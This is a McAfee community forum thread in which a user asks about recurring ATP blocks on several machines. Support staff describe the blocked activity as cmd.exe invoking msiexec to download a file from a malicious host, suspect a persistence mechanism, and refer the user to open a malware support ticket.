I would like you to see the related image since for a few days I have the following log in some machines, the ATP blocks but nevertheless, no matter how much the analysis is carried out, the behavior persists. I would like to know what may be causing it and how to eliminate it
Thank you for reaching out to McAfee Community.
From the provided details, it looks like you needed information on the file.
I suggest you can raise an SR and provide us with sample as per KB below and we can share analysis on this one.
Was my reply helpful?
IF yes, please give me Kudo.
If I have answered your query, Kindly mark this as solution so that together we help other community members.
Hi @antivirusfnc ,
Thank you for reaching us on community !
As per the image attached to the post, i see that cmd.exe is invoked to run msiexec command to download a file (appears to be a png file as per the screenshot) from a malicious site/ IPaddress .
I suspect that the infected machines must have a malicious file containing the command places in start-up location or must be running as a task at specified time interval.
As specified by @yaz i would request you to open a malware ticket with support team to check on this.
- Rohit Francis
Hi, and Thanks you for your collaboration!!
The supported case was created (4-22251102041), it was updated by sending the procmon and MER logs from one of the affected machines.
I am waiting for more progress